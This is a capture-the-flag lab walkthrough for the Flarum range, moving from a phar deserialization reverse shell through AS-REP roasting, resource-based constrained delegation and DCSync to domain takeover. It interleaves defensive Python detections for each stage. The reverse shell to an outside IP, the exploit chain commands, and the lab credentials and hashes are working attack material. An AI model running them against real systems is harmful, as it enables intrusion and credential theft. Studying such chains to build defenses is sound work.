
春秋云镜 Flarum

Information gathering

```text
[09:47:00] 200 -    2KB - /tags
[09:47:16] 200 -    1KB - /web.config
[09:45:21] 200 -    2KB - /all
[09:45:21] 404 -   48B  - /api-doc
[09:45:21] 404 -   48B  - /api/__swagger__/
[09:45:21] 404 -   48B  - /api/2/explore/
[09:45:21] 404 -   48B  - /api/api
[09:45:21] 404 -   48B  - /api.php
[09:45:21] 404 -   48B  - /api-docs
[09:45:21] 404 -   48B  - /api.log
[09:45:21] 404 -   48B  - /api.py
[09:45:21] 404 -   48B  - /api.json
[09:45:21] 404 -   48B  - /api/_swagger_/
[09:45:21] 404 -   48B  - /api/2/issue/createmeta
[09:45:21] 404 -   48B  - /api/api-docs
[09:45:21] 200 -    2KB - /api/
[09:45:21] 404 -   48B  - /api/apidocs/swagger.json
[09:45:21] 404 -   48B  - /api/apidocs
[09:45:21] 200 -    2KB - /api
[09:45:24] 301 -  313B  - /assets  ->  http://39.99.246.81/assets/
[09:45:24] 403 -  277B  - /assets/
[09:45:55] 401 -    2KB - /flags
[09:46:13] 405 -    2KB - /login
[09:46:14] 302 -    0B  - /logout  ->  http://39.99.246.81
[09:46:40] 405 -    2KB - /register
[09:46:41] 405 -    2KB - /reset
[09:46:45] 403 -  277B  - /server-status
[09:46:45] 403 -  277B  - /server-status/
[09:46:47] 401 -    2KB - /settings
```

Brute-forced the password with rockyou, then went into the admin panel and looked up known vulnerabilities for it: a phar deserialization issue is present.

Foothold on the jump host

```bash
php -d phar.readonly=0 phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/123.249.0.46/8080 0>&1'"
```
Custom CSS (the data URI's base64 payload is the phar archive produced by the phpggc command above):

```css
@import (inline) 'data:text/css;base64,<base64 phar archive>';
.test {content: data-uri("phar://./assets/forum.css");}
```
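From the defensive side, the file that gets resolved through `phar://` is just a tar archive whose members carry phar names (`.phar/stub.php`, `.phar/.metadata.bin`, `.phar/signature.bin` are visible in the encoded archive). The following Python check is added here and is not part of the writeup or of Flarum: it inspects an uploaded file for those tar-format phar markers regardless of its extension. It assumes tar-format phars as produced by `phpggc -p tar`; the native phar binary format is not covered, and the sample archives are constructed with benign contents.

```python
import io
import tarfile

# Member names used by the tar-based phar format. .phar/.metadata.bin holds the
# serialized metadata that PHP unserializes when a phar:// path is opened.
PHAR_TAR_MARKERS = {".phar/stub.php", ".phar/.metadata.bin", ".phar/signature.bin"}
PHAR_STUB_MARKER = b"__HALT_COMPILER();"


def scan_tar_for_phar(data: bytes) -> dict:
    """Return which phar markers a tar blob carries (empty findings if not a tar)."""
    findings = {"phar_members": [], "stub_has_halt_compiler": False, "has_metadata": False}
    try:
        tar = tarfile.open(fileobj=io.BytesIO(data), mode="r:*")
    except tarfile.TarError:
        return findings  # not a tar archive at all
    with tar:
        for member in tar.getmembers():
            if member.name in PHAR_TAR_MARKERS:
                findings["phar_members"].append(member.name)
            if member.name == ".phar/.metadata.bin":
                findings["has_metadata"] = True
            if member.name == ".phar/stub.php" and member.isfile():
                f = tar.extractfile(member)
                if f is not None and PHAR_STUB_MARKER in f.read(4096):
                    findings["stub_has_halt_compiler"] = True
    return findings


def is_suspicious_phar(data: bytes) -> bool:
    """True when an upload looks like a phar disguised as another file type."""
    f = scan_tar_for_phar(data)
    return f["has_metadata"] or f["stub_has_halt_compiler"]


def build_sample_tar(with_phar_members: bool) -> bytes:
    """Constructed sample: a tar with or without phar-format members (benign contents)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        files = {"test.txt": b"hello\n"}
        if with_phar_members:
            files[".phar/stub.php"] = b"<?php __HALT_COMPILER(); ?>\r\n"
            files[".phar/.metadata.bin"] = b"i:1;"  # harmless serialized integer
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()
```

Running this over every file written under the web root's assets directory catches the tar variant used here; setting `phar.readonly=1` does not stop reading, so content inspection is the relevant control on the upload path.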

Then upload an msf backdoor and probe with the privilege escalation suggester module.

```text
run post/multi/manage/autoroute
run autoroute -p
multi/recon/local_exploit_suggester
```

Read the flag through the misconfigured Linux capability on openssl.

```bash
LFILE=file_to_read
openssl enc -in "$LFILE"
```

Internal network reconnaissance

```text
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.52:80
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.52:22
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:445
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:445
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:445
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:389
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:139
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:139
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:139
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:135
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:135
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:135
[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:88
[2025-07-15 11:27:22] [SUCCESS] 服务识别 172.22.60.52:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.3 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3.]
[2025-07-15 11:27:23] [SUCCESS] 端口开放 172.22.60.52:8080
[2025-07-15 11:27:27] [SUCCESS] 服务识别 172.22.60.15:445 =>
[2025-07-15 11:27:27] [SUCCESS] 服务识别 172.22.60.42:445 =>
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:445 =>
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:389 =>
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.15:139 =>  Banner:[.]
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.42:139 =>  Banner:[.]
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:139 =>  Banner:[.]
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.52:80 => [http]
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:88 =>
[2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.52:8080 =>
[2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.15:135 =>
[2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.42:135 =>
[2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.8:135 =>
[2025-07-15 11:28:28] [INFO] 存活端口数量: 14
[2025-07-15 11:28:28] [INFO] 开始漏洞扫描
[2025-07-15 11:28:28] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.60.8
主机名: DC
发现的网络接口:
IPv4地址:
└─ 172.22.60.8
└─ 169.254.192.192
[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.60.15
主机名: PC1
发现的网络接口:
IPv4地址:
└─ 172.22.60.15
└─ 169.254.126.238
[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.60.42
主机名: Fileserver
发现的网络接口:
IPv4地址:
└─ 172.22.60.42
└─ 169.254.186.35
[2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.42    XIAORANG\FILESERVER
[2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.15    XIAORANG\PC1
[2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.8     DC:XIAORANG\DC
```

Found config.php, obtained the database password from it, then exported the user table.

```bash
mysql -u root -p -D your_database -s -N -e "SELECT email FROM flarum_users;"
```

The hint says a Kerberos attack is needed, so use GetNPUsers to look for users that do not require Kerberos pre-authentication.

```bash
proxychains4 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py xiaorang.lab/ -dc-ip 172.22.60.8 -usersfile user.txt
```

Two AS-REP hashes come back, for wangyun and zhangxin.


Crack the passwords

```bash
hashcat -m 18200 -a 0 baopo.txt /usr/share/wordlists/rockyou.txt
```
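What this step looks like from the domain controller's side: GetNPUsers asks the KDC for a TGT for each account flagged "Do not require Kerberos preauthentication", so every hit produces Security event 4768 with Pre-Authentication Type 0, and with Ticket Encryption Type 0x17 (RC4) when the resulting AS-REP is the etype that hashcat mode 18200 cracks. The following Python detection is added here and is not from the writeup; the 4768 events are constructed samples in a simplified dict form, and 172.22.60.52 (the jump host from the scan above) is used as the sample source address.

```python
# Simplified dict form of Windows Security event 4768 (a Kerberos TGT was requested).
# PreAuthType 0 means the KDC issued the TGT without pre-authentication, which is
# exactly what GetNPUsers relies on; TicketEncryptionType 0x17 is RC4-HMAC, the
# etype that hashcat mode 18200 cracks. Constructed samples, not real DC logs.
PREAUTH_NONE = 0
ETYPE_RC4_HMAC = 0x17

SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "wangyun", "IpAddress": "172.22.60.52",
     "PreAuthType": PREAUTH_NONE, "TicketEncryptionType": ETYPE_RC4_HMAC, "Status": 0},
    {"EventID": 4768, "TargetUserName": "zhangxin", "IpAddress": "172.22.60.52",
     "PreAuthType": PREAUTH_NONE, "TicketEncryptionType": ETYPE_RC4_HMAC, "Status": 0},
    # Normal logons: pre-auth type 2 (PA-ENC-TIMESTAMP) and AES256 (0x12).
    {"EventID": 4768, "TargetUserName": "PC1$", "IpAddress": "172.22.60.15",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0},
    {"EventID": 4768, "TargetUserName": "wangyun", "IpAddress": "172.22.60.15",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0},
]


def asrep_roast_candidates(events):
    """Successful TGT issuances without pre-authentication: each one hands out an
    AS-REP that can be cracked offline, so every such account should be reviewed."""
    return [e for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == PREAUTH_NONE and e["Status"] == 0]


def asrep_roast_sources(events, min_accounts=2):
    """Group the candidates by client IP. One source collecting no-pre-auth TGTs for
    several accounts (especially RC4 ones) is the footprint of a GetNPUsers-style sweep."""
    per_ip = {}
    for e in asrep_roast_candidates(events):
        entry = per_ip.setdefault(e["IpAddress"], {"accounts": set(), "rc4_tickets": 0})
        entry["accounts"].add(e["TargetUserName"])
        if e["TicketEncryptionType"] == ETYPE_RC4_HMAC:
            entry["rc4_tickets"] += 1
    return {ip: {"accounts": sorted(v["accounts"]), "rc4_tickets": v["rc4_tickets"]}
            for ip, v in per_ip.items() if len(v["accounts"]) >= min_accounts}
```

The directory-side fix is to clear the "Do not require Kerberos preauthentication" flag (userAccountControl bit 0x400000) on the accounts this reports.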

Cracked successfully. Viewing the domain in BloodHound shows that the zhangxin user belongs to a group with generic rights over a machine, and that machine has DCSync rights over XIAORANG.LAB, so all hashes in the domain can be dumped.

RDP login

```text
wangyun@xiaorang/Adm12geC
```

Decrypting with SharpXDecrypt

Xshell 7 turns out to be installed on the host; decrypt its saved sessions with SharpXDecrypt.

```text
Xshell全版本凭证一键导出工具!(支持Xshell 7.0+版本)
Author: 0pen1
Github: https://github.com/JDArmy
[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!

[*] Start GetUserPath....
UserPath: C:\Users\wangyun\Documents\NetSarang Computer\7
[*] Get UserPath Success !

[*] Start GetUserSID....
Username: wangyun
userSID: S-1-5-21-3535393121-624993632-895678587-1107
[*] GetUserSID Success !

XSHPath: C:\Users\wangyun\Documents\NetSarang Computer\7\Xshell\Sessions\SSH.xsh
Host: 172.22.60.45
UserName: zhangxin
Password: admin4qwY38cc
Version: 7.1
```

Then log in as the zhangxin user and use Account Operators membership to obtain domain controller privileges.

Lateral movement via Account Operators

First query the members of the Account Operators group.

```text
adfind.exe -h 172.22.60.42:389 -s subtree -b CN="Account Operators",CN=Builtin,DC=xiaorang,DC=com member
```

Then create a new machine account.

```powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\Powermad.ps1
New-MachineAccount -MachineAccount test3 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
```

Then configure the delegation. First look up the SID:

```powershell
Get-NetComputer test1 -Properties objectsid
```

```text
test3 sid: S-1-5-21-1400638014-602433399-2258725660-1152
```

Modify the msds-allowedtoactonbehalfofotheridentity value on FileServer.

```powershell
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer FILESERVER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
```

Next comes requesting the service ticket (ST), but before that the hostname mapping has to be configured.

```bash
vim /etc/hosts
```

Then request the ST.

```bash
proxychains python3 getST.py -dc-ip 172.22.60.8 "xiaorang.lab/test3$:123456" -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator
```

Import the ticket, then log in without a password.

```bash
export KRB5CCNAME=administrator@cifs_FILESERVER.xiaorang.lab@XIAORANG.LAB.ccache
proxychains python3 smbexec.py -no-pass -k FILESERVER.xiaorang.lab
```

The whole process can also be done with the Impacket suite.

```bash
proxychains python3 addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'TEST2$'
proxychains python3 getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8
```
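A defender's counterpart to both RBCD variants above (the PowerView descriptor write and impacket's rbcd.py), added here rather than taken from the writeup: parse the SDDL form of a computer's msDS-AllowedToActOnBehalfOfOtherIdentity and report every trustee that is not on an allowlist, since any SID listed there may impersonate users to that computer. It assumes the attribute has already been converted from its binary form to SDDL (for example with RawSecurityDescriptor.GetSddlForm in PowerShell) and uses the descriptor string from the PowerView step as sample input.

```python
import re

# Two-letter SDDL access-right codes that appear in AD ACEs (the ones this page uses
# plus the generic rights), mapped to readable names.
SDDL_RIGHTS = {
    "CC": "CreateChild", "DC": "DeleteChild", "LC": "ListChildren", "SW": "Self",
    "RP": "ReadProperty", "WP": "WriteProperty", "DT": "DeleteTree", "LO": "ListObject",
    "CR": "ControlAccess", "SD": "Delete", "RC": "ReadControl", "WD": "WriteDac",
    "WO": "WriteOwner", "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite",
    "GX": "GenericExecute",
}
ACE_RE = re.compile(r"\(([^)]*)\)")

# The descriptor written to FILESERVER in the PowerView step above.
SAMPLE_FILESERVER_SDDL = (
    "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"
)


def parse_sddl_aces(sddl):
    """Parse the DACL of an SDDL string into (ace_type, rights, trustee) tuples."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # DACL part, SACL (if any) dropped
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")  # type;flags;rights;object_guid;inherit_guid;trustee
        if len(fields) < 6:
            continue
        ace_type, rights_str, trustee = fields[0], fields[2], fields[5]
        if rights_str.startswith("0x"):
            rights = [rights_str]  # numeric access mask, left as-is
        else:
            rights = [SDDL_RIGHTS.get(rights_str[i:i + 2], rights_str[i:i + 2])
                      for i in range(0, len(rights_str), 2)]
        aces.append((ace_type, rights, trustee))
    return aces


def audit_rbcd(computer, sddl, allowed_trustees=()):
    """Report allow-ACEs whose trustee is not expected to delegate to `computer`.
    An empty attribute (no delegation configured) yields no findings."""
    findings = []
    for ace_type, rights, trustee in parse_sddl_aces(sddl):
        if ace_type == "A" and trustee not in allowed_trustees:
            findings.append({"computer": computer, "trustee": trustee, "rights": rights})
    return findings
```

Run it over every computer object that has the attribute set; in most environments the allowlist is empty, so any finding is worth a look.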

After gaining access to the host, dump FILESERVER's hashes.

```bash
proxychains secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
```


This yields the FILESERVER$ account hash 951d8a9265dfb652f42e5c8c497d70dc; next, use the machine account hash to obtain the domain controller hashes.

DCSync attack

Export the domain controller hashes with secretsdump.py.

```bash
proxychains secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
```

This gives the domain controller hash c3cfdc08527ec4ab6aa3e630e79d349b.
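On the DC, the DCSync step above is visible as Security event 4662 that carries the DS-Replication-Get-Changes extended-right GUIDs but comes from a principal that is not a domain controller (here the Fileserver$ machine account). This Python check is added here and is not part of the writeup; the 4662 events are constructed samples in a simplified dict form, and DOMAIN_CONTROLLER_ACCOUNTS is an assumed allowlist holding the only DC in this range.

```python
# Extended rights that a replication (DCSync) request exercises on the domain object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS, shown as "Control Access" in 4662

# Constructed samples in the shape of Security event 4662 (an operation was performed
# on an AD object), as logged on the DC. Properties lists the GUIDs that were exercised.
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "Fileserver$", "SubjectDomainName": "XIAORANG",
     "AccessMask": CONTROL_ACCESS, "Properties": [DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL]},
    {"EventID": 4662, "SubjectUserName": "DC$", "SubjectDomainName": "XIAORANG",
     "AccessMask": CONTROL_ACCESS, "Properties": [DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL]},
    # Ordinary write on a user object: schema GUID of the user class, no replication right.
    {"EventID": 4662, "SubjectUserName": "zhangxin", "SubjectDomainName": "XIAORANG",
     "AccessMask": 0x20, "Properties": ["bf967aba-0de6-11d0-a285-00aa003049e2"]},
]

# Assumed allowlist: accounts that legitimately replicate (the DCs themselves).
DOMAIN_CONTROLLER_ACCOUNTS = {"DC$"}


def is_replication_request(event):
    """True when a 4662 exercises a replication extended right via Control Access."""
    return (event["EventID"] == 4662
            and event["AccessMask"] & CONTROL_ACCESS != 0
            and bool(REPLICATION_GUIDS & set(event["Properties"])))


def dcsync_suspects(events, dc_accounts=DOMAIN_CONTROLLER_ACCOUNTS):
    """Subjects that replicated directory data without being a domain controller."""
    return [e["SubjectUserName"] for e in events
            if is_replication_request(e) and e["SubjectUserName"] not in dc_accounts]
```

4662 only fires when the domain object's SACL audits Control Access, so that audit entry is a prerequisite for this detection.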

Lateral movement

Move laterally with wmiexec.py.

```bash
proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.15 -codec gbk
```

Domain controller compromised.
